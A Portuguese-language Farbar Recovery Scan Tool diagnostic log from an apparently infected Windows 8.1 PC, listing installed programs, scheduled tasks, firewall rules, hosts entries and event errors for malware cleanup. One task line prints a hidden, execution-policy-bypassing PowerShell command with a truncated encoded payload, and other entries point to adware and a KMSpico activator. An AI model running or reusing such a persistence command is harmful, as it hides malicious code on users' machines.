Document format: text/plain

Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão:05-03-2016 01
Executado por Alice Carolina (2016-03-07 17:02:07)
Executando a partir de C:\Users\Alice Carolina\Desktop
Windows 8.1 Pro (X64) (2014-10-21 01:29:40)
Modo da Inicialização: Normal
==========================================================


==================== Contas: =============================

Administrador (S-1-5-21-3161854369-2407533720-2015392319-500 - Administrator - Disabled)
Alice Carolina (S-1-5-21-3161854369-2407533720-2015392319-1004 - Administrator - Enabled) => C:\Users\Alice Carolina
Convidado (S-1-5-21-3161854369-2407533720-2015392319-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3161854369-2407533720-2015392319-1003 - Limited - Enabled)

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

µTorrent (HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\uTorrent) (Version: 3.4.5.41865 - BitTorrent Inc.)
4500_G510af_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
4500G510af (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden
4500G510af_Software_Min (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden
64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Reader XI - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AB0000000001}) (Version: 11.0.00 - Adobe Systems Incorporated)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 11.1.2253 - AVAST Software)
BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.2.0.0115 - Disc Soft Ltd)
Destinations (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden
Fax (x32 Version: 140.0.307.000 - Hewlett-Packard) Hidden
Freemake Video Converter versão 4.1.6 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.6 - Ellora Assets Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
Guitar Pro 5.2 (HKLM-x32\...\Guitar Pro 5_is1) (Version: - Arobas Music)
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
HP Officejet 4500 G510a-f 14.0 Rel. 6 (HKLM\...\{A49C5804-8F24-433C-99B2-9F9F541090C7}) (Version: 14.0 - HP)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
HPSSupply (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
Java 7 Update 55 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417055FF}) (Version: 7.0.550 - Oracle)
Java 7 Update 55 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.550 - Oracle)
MarketResearch (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 41.0.2 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 41.0.2 (x86 pt-BR)) (Version: 41.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 41.0.2 - Mozilla)
OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
Revisores de Texto do Microsoft Office 2013 – Português do Brasil (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATENÇÃO
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden
Spotify (HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\Spotify) (Version: 1.0.24.104.g92a22684 - Spotify AB)
Stardock Start8 (HKLM\...\Start8_is1) (Version: 1.40.1 - Stardock Software, Inc.)
Status (x32 Version: 140.0.342.000 - Hewlett-Packard) Hidden
Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0416-1000-0000000FF1CE}_Office15.PROPLUS_{2BA6245D-FBB9-42F6-AFD9-C0DC52763AD5}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-012B-0416-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.2 - VideoLAN)
Warsaw 1.8.0.10356 64 bits (HKLM\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 1.8.0.10356 - GAS Tecnologia)
WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden
WinRAR 5.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)

==================== Exame Personalizado CLSID (Whitelisted): ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)


==================== Tarefas Agendadas (Whitelisted) =============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {055B2B04-DD2F-48D9-B5B2-F6D1DF2C5D6A} - System32\Tasks\ttwifi => C:\Program Files (x86)\ttwifi\tiantianwifi.exe
Task: {0638687D-EE37-4925-822F-925EAB17B76A} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-02-14] (Microsoft Corporation)
Task: {2A87A242-7086-4299-BF26-A25D05D3A513} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {2E977C6D-607A-4859-B934-4EF45252BD20} - System32\Tasks\SPDriver => C:\Program Files (x86)\ShopperPro3\JSDriver\Unknown\jsdrv.exe <==== ATENÇÃO
Task: {6437E56C-65F2-4524-808A-73FD3963CE87} - \WPD\SqmUpload_S-1-5-21-3161854369-2407533720-2015392319-1001 -> Nenhum Arquivo <==== ATENÇÃO
Task: {677073D0-AC15-47FE-9DFA-41D472B919EE} - \Optimize Start Menu Cache Files-S-1-5-21-3161854369-2407533720-2015392319-1001 -> Nenhum Arquivo <==== ATENÇÃO
Task: {84F64767-177C-4C72-9C2A-03F8D9D9A397} - System32\Tasks\{0E0B0947-7D0B-0509-0511-7A7D0D081104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAIAAgACAAIAA7ACAAOwA7ACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUA (a entrada de dados tem 9420 mais caracteres).
Task: {8E2B2305-9A17-4DAC-9C54-C20277E9D14E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-10] (Adobe Systems Incorporated)
Task: {972CC6DF-7DC7-4879-B265-E323B357D4B9} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-03-07] (AVAST Software)
Task: {B480721F-44DA-4467-9090-EEEAA4C03BD4} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-03-07] (AVAST Software)
Task: {B7A535A1-4A13-4A07-B575-891F696CFC2C} - System32\Tasks\Pritc => C:\Users\Alice Carolina\AppData\Local\Temp\is-7L49M.tmp\print.exe [2016-03-03] (VLOME) <==== ATENÇÃO
Task: {C6AA24D0-27FC-48A0-ADC7-5DB46B907805} - System32\Tasks\DNS Monitoring => C:\Windows\system32\regsvr32.exe [2014-10-28] (Microsoft Corporation)
Task: {C72C65B8-9ED2-4DDA-95A9-2D560643AA99} - System32\Tasks\osTip => C:\ProgramData\WindowsMsg\osmsg.exe [2016-02-09] ()
Task: {CEF751B2-CD90-497C-A040-E7D99A6668D6} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {D0BD073B-C4DC-4D46-BFA1-C2B33AE8FC28} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {E47017ED-3921-47E2-9235-7F6A27DED38A} - System32\Tasks\{C1FB7BB3-A511-4593-8471-B4909CBA5E3C} => pcalua.exe -a D:\DirectX\dxsetup.exe -d D:\DirectX
Task: {E8770F09-A263-403B-90E5-B4FB9E70F637} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {EA6359C1-A298-44E8-AA1C-480A81FD313B} - System32\Tasks\Eograaavamkse => C:\ProgramData\Eograaavamkse\1.0.7.1\ihoedroe.exe [2016-03-07] ()
Task: {EF26222B-655B-4E93-BC24-FC8619F586EA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Atalhos =============================

(As entradas podem ser listadas para serem restauradas ou removidas.)

==================== Módulos Carregados (Whitelisted) ==============

2016-03-06 23:47 - 2016-03-07 17:02 - 00284160 _____ () C:\Program Files (x86)\68317320-1457318624-11E0-BC93-14DAE9B8CC23\jnsl8E97.tmp
2016-03-07 03:02 - 2016-03-07 03:02 - 00341504 _____ () C:\Program Files (x86)\68317320-1457318624-11E0-BC93-14DAE9B8CC23\knsk3FE2.tmp
2016-03-06 23:48 - 2016-03-07 17:02 - 00416256 _____ () C:\Program Files (x86)\68317320-1457318624-11E0-BC93-14DAE9B8CC23\hnsyAEF2.tmp
2016-03-07 16:24 - 2016-03-07 16:24 - 00113496 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2016-03-07 16:23 - 2016-03-07 16:23 - 00133768 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-03-07 16:26 - 2016-03-07 16:26 - 02990080 _____ () C:\Program Files\AVAST Software\Avast\defs\15110499\algo.dll
2016-03-07 16:24 - 2016-03-07 16:24 - 00480760 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2016-03-07 16:24 - 2016-03-07 16:24 - 00307808 _____ () C:\Program Files\AVAST Software\Avast\browser_pass.dll
2016-03-07 16:41 - 2016-03-07 16:41 - 02838016 _____ () C:\Program Files\AVAST Software\Avast\defs\16030700\algo.dll
2016-03-07 16:24 - 2016-03-07 16:25 - 40539648 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2015-04-10 22:02 - 2014-02-10 11:44 - 04592128 _____ () C:\Users\Alice Carolina\AppData\Local\Google\Chrome\User Data\SwiftShader\3.2.6.45159\libglesv2.dll
2015-04-10 22:02 - 2014-02-10 11:44 - 00112128 _____ () C:\Users\Alice Carolina\AppData\Local\Google\Chrome\User Data\SwiftShader\3.2.6.45159\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(Se uma entrada for incluída na fixlist, somente o ADS será removido.)

AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10]
AlternateDataStreams: C:\Windows\system32\Drivers\gbpddfac64.sys:X5ZN8aGvT4 [762]

==================== Modo de Segurança (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)


==================== EXE Associação (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)


==================== Internet Explorer confiável/restrito ===============

(Se uma entrada for incluída na fixlist, será removida do Registro.)

IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\google.com -> www.google.com
IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\google.com.br -> www.google.com.br
IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\itau.b.br -> www.itau.b.br
IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\itau.com.br -> hxxps://bankline.itau.com.br
IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\itau.com.br -> bankline.itau.com.br
IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\itaupersonnalite.com.br -> hxxp://www.itaupersonnalite.com.br
IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\itaupersonnalite.com.br -> www.itaupersonnalite.com.br

==================== Hosts Conteúdo: ==========================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2016-03-07 12:16 - 2016-03-06 23:39 - 00000967 ____N C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\Control Panel\Desktop\\Wallpaper -> C:\Users\Alice Carolina\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.

==================== MSCONFIG/TASK MANAGER ítens desabilitados ==

(Atualmente não há nenhuma correção automática para esta seção.)

HKLM\...\StartupApproved\Run32: => "SPDriver"
HKLM\...\StartupApproved\Run32: => "YTDownloader"

==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{B7ED2A7B-DB38-455D-A758-FD30576D911E}] => (Allow) C:\Users\Alice Carolina\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{5373262F-65C1-48D2-9ECD-45D646414854}] => (Allow) C:\Users\Alice Carolina\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{1A4E86D8-9AFA-4EA4-B08B-7CFF795B2502}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{EFEA9D13-E341-4A50-A8BA-1B9DA9D16DCD}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{5C85A128-636C-45EB-93CC-DA4640F79CF1}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{54FE10D2-6471-4A42-B49C-E36620DD275E}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{297414A0-5766-4C86-A905-8F5FC75D1AE7}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{ED6E3D40-820A-49BC-A47F-6DF9BB7BFF28}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{A00A9A3B-27B2-4A3C-A7D5-DDD98F57AD3A}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{0A363C08-0493-43B7-8474-7A4B5043F7F2}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{C03F7F8C-077E-4BE5-8BDA-11E4294AB72A}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{33F46763-278D-4CE6-9281-7E46E7642A30}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [TCP Query User{03BE0B3D-5683-4F0E-B689-B3306AC8520D}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{1461E9D7-332C-4356-BE75-8DCB99E16247}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{0F896D10-DF3E-47EA-944A-0984507614CB}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{A19ECD6E-4657-4A14-AA38-32E1BC1222F6}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{632F53F0-DE0E-4C62-A242-373A70A79D97}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{67B530E3-3383-497E-9ADA-E03FD9339A91}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{6DBC19D4-474C-4D00-804E-E4C67B82F85C}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{D0D24A49-0018-4F14-BBFD-98196873C262}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{EACC910D-2838-4569-9D3E-089BBD690D56}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{D9D3D0F4-7CBC-4217-9528-064D8D8DCA82}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{73467799-CC1A-4ED5-AB19-4F4BFF63BB61}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{F4DCB06D-7EDA-4BEE-AF8B-041DE93E8F6E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{26A6E861-85DD-4AA4-A295-C2A874C388AC}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe
FirewallRules: [{B8D1BBDA-BC3B-497D-99B7-50DE43BDEE31}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe
FirewallRules: [{2D5D9143-25D7-4C98-9B1F-4434AB0AC87F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{A6AC1250-4024-451C-AF98-61E7BB044DEE}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{25443120-345E-4FD6-A033-DEE2436B9CDA}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{50A5D97F-A773-41AC-A79C-990C9B178528}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{0614BF30-1501-4C1C-B08A-D6E901CC61BC}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{B4301FBB-7C77-4DD8-8FBD-81D898CC67D8}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe
FirewallRules: [{E74D1779-02C1-49E1-9D08-12744B48AE49}] => (Allow) C:\Windows\SysWOW64\lxczcoms.exe
FirewallRules: [{ADCC2559-D61C-4ED6-8856-9B8297CF80D0}] => (Allow) C:\Windows\SysWOW64\lxczcoms.exe
FirewallRules: [{DA1C89F4-498A-43A3-9C77-9E1BA93165B4}] => (Allow) C:\Windows\System32\lxczcoms.exe
FirewallRules: [{65792788-6AA8-4127-8438-4EC9F93D404E}] => (Allow) C:\Windows\System32\lxczcoms.exe
FirewallRules: [{33E28C64-3C0E-4BB1-A226-847CF426F254}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3D7AFDA6-07D3-44EF-89B1-DB26A82EB14A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{C3B7B762-B51C-41CC-97FF-D973EE0E654B}C:\users\alice carolina\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\alice carolina\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{7E539DA5-C5ED-4B3B-A7DA-CE69BEB07E26}C:\users\alice carolina\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\alice carolina\appdata\roaming\spotify\spotify.exe
FirewallRules: [{AD1DDAA3-CFBC-4900-8609-DCDF90BEE3FF}] => (Block) C:\users\alice carolina\appdata\roaming\spotify\spotify.exe
FirewallRules: [{E3AFAF28-445A-4475-8023-FC473055607D}] => (Block) C:\users\alice carolina\appdata\roaming\spotify\spotify.exe
FirewallRules: [{C10932F5-AC67-4B98-B8B7-2BCBA60DD5FF}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{3E11B389-C0B8-4858-AC7C-8E3E6D50AA0B}C:\users\alice carolina\downloads\medal of honor allied assault\mohaa.exe] => (Allow) C:\users\alice carolina\downloads\medal of honor allied assault\mohaa.exe
FirewallRules: [UDP Query User{D45874A1-59EC-4043-AEA7-01270B400226}C:\users\alice carolina\downloads\medal of honor allied assault\mohaa.exe] => (Allow) C:\users\alice carolina\downloads\medal of honor allied assault\mohaa.exe
FirewallRules: [TCP Query User{604BA05C-1ECE-449B-A609-819B1E6BF98C}C:\windows\syswow64\lxczcoms.exe] => (Allow) C:\windows\syswow64\lxczcoms.exe
FirewallRules: [UDP Query User{1075F385-03C1-4D44-8BED-26F0A90230B3}C:\windows\syswow64\lxczcoms.exe] => (Allow) C:\windows\syswow64\lxczcoms.exe

==================== Pontos de Restauração =========================

26-02-2016 20:01:35 DirectX 9.0 instalado
06-03-2016 18:10:05 Ponto de Verificação Agendado

==================== Dispositivos Apresentando Falhas No Gerenciador =============


==================== Erros no Log de eventos: =========================

Erros em Aplicativos:
==================
Error: (03/07/2016 03:49:04 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: AUTORIDADE NT)
Description: Falha ao descarregar as cadeias de caracteres do contador de desempenho do serviço WmiApRpl (WmiApRpl). O primeiro DWORD da seção de dados contém o código de erro.

Error: (03/07/2016 03:49:04 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORIDADE NT)
Description: As cadeias de caracteres de desempenho no valor do Registro de desempenho foram corrompidas durante o processamento do provedor do contador de extensões Performance. O valor BaseIndex do Registro de desempenho é o primeiro DWORD na seção de dados, o valor LastCounter é o segundo DWORD na seção de dados e o valor LastHelp é o terceiro DWORD na seção de dados.

Error: (03/07/2016 03:49:04 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORIDADE NT)
Description: As cadeias de caracteres de desempenho no valor do Registro de desempenho foram corrompidas durante o processamento do provedor do contador de extensões Performance. O valor BaseIndex do Registro de desempenho é o primeiro DWORD na seção de dados, o valor LastCounter é o segundo DWORD na seção de dados e o valor LastHelp é o terceiro DWORD na seção de dados.

Error: (03/07/2016 01:10:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: spbia.exe, versão: 1.0.0.4, carimbo de data/hora: 0x56dc16b3
Nome do módulo com falha: spbia.exe, versão: 1.0.0.4, carimbo de data/hora: 0x56dc16b3
Código de exceção: 0xc0000005
Deslocamento da falha: 0x0000000000003f81
ID do processo com falha: 0xeb0
Hora de início do aplicativo com falha: 0xspbia.exe0
Caminho do aplicativo com falha: spbia.exe1
Caminho do módulo com falha: spbia.exe2
ID do Relatório: spbia.exe3
Nome completo do pacote com falha: spbia.exe4
ID do aplicativo relativo ao pacote com falha: spbia.exe5

Error: (03/07/2016 12:55:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: spbia.exe, versão: 1.0.0.4, carimbo de data/hora: 0x56dc16b3
Nome do módulo com falha: spbia.exe, versão: 1.0.0.4, carimbo de data/hora: 0x56dc16b3
Código de exceção: 0xc0000005
Deslocamento da falha: 0x0000000000003f81
ID do processo com falha: 0xf48
Hora de início do aplicativo com falha: 0xspbia.exe0
Caminho do aplicativo com falha: spbia.exe1
Caminho do módulo com falha: spbia.exe2
ID do Relatório: spbia.exe3
Nome completo do pacote com falha: spbia.exe4
ID do aplicativo relativo ao pacote com falha: spbia.exe5

Error: (03/07/2016 12:21:44 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: chrome.exe, versão: 48.0.2564.116, carimbo de data/hora: 0x56c52f1d
Nome do módulo com falha: UGProBro.dll_unloaded, versão: 1.5.36.16098, carimbo de data/hora: 0x56b07335
Código de exceção: 0xc0000005
Deslocamento da falha: 0x0001dc73
ID do processo com falha: 0xd68
Hora de início do aplicativo com falha: 0xchrome.exe0
Caminho do aplicativo com falha: chrome.exe1
Caminho do módulo com falha: chrome.exe2
ID do Relatório: chrome.exe3
Nome completo do pacote com falha: chrome.exe4
ID do aplicativo relativo ao pacote com falha: chrome.exe5

Error: (03/07/2016 12:20:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: chrome.exe, versão: 48.0.2564.116, carimbo de data/hora: 0x56c52f1d
Nome do módulo com falha: UGProBro.dll_unloaded, versão: 1.5.36.16098, carimbo de data/hora: 0x56b07335
Código de exceção: 0xc00001a5
Deslocamento da falha: 0x0003a27c
ID do processo com falha: 0xd68
Hora de início do aplicativo com falha: 0xchrome.exe0
Caminho do aplicativo com falha: chrome.exe1
Caminho do módulo com falha: chrome.exe2
ID do Relatório: chrome.exe3
Nome completo do pacote com falha: chrome.exe4
ID do aplicativo relativo ao pacote com falha: chrome.exe5

Error: (03/07/2016 12:17:51 PM) (Source: Application Error) (EventID: 1000) (User: )
